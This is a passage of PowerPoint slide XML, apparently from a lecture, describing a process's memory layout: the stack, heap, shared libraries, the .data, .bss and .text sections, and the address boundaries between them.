          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>0xbfffffff</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2690960" y="3061035"/>
            <a:ext cx="1326004" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>0xc0000000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33768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0" grpId="0"/>
      <p:bldP spid="11" grpId="0"/>
      <p:bldP spid="12" grpId="0"/>
      <p:bldP spid="1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5090" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Process Structure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985091" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Environment/Argument section</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used for environment data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used for the command line data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack section</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used for local parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used for saving the processor status</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Memory-mapping segment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used for shared libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Heap section</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used for dynamically allocated data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data section (Static/global </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Initialized variables (.data)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uninitialized variables (.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code/Text section (.text)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Marked read-only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Modifications causes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>segfaults</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985092" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="5495261"/>
            <a:ext cx="2590800" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Code (.text)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985093" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="5209511"/>
            <a:ext cx="2590800" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Data (.data)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985094" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="3175086"/>
            <a:ext cx="2590800" cy="507121"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985095" name="Line 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5105400" y="2317834"/>
            <a:ext cx="0" cy="342900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endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985096" name="Line 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7848600" y="2317834"/>
            <a:ext cx="0" cy="342900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endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985097" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="3175085"/>
            <a:ext cx="2590800" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Stack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985098" name="Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5813970" y="3290461"/>
            <a:ext cx="3175" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985099" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5095324" y="5724937"/>
            <a:ext cx="2278188" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Bottom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>memory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> (0x00800000)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985100" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5103181" y="2063920"/>
            <a:ext cx="2134495" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Top </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>memory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> (0xBFFFFFFF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985101" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="4342640"/>
            <a:ext cx="2590800" cy="181071"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985102" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="4523711"/>
            <a:ext cx="2590800" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E6B9B8"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Heap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985103" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="7010402" y="4430232"/>
            <a:ext cx="3175" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985104" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="2317835"/>
            <a:ext cx="2590800" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Env/Argv Strings</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985105" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="2603584"/>
            <a:ext cx="2590800" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Env/Argv Pointers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985106" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="2889335"/>
            <a:ext cx="2590800" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Argc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985107" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="4923761"/>
            <a:ext cx="2590800" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Data (.bss)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985108" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="3919537"/>
            <a:ext cx="2590800" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Shared</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
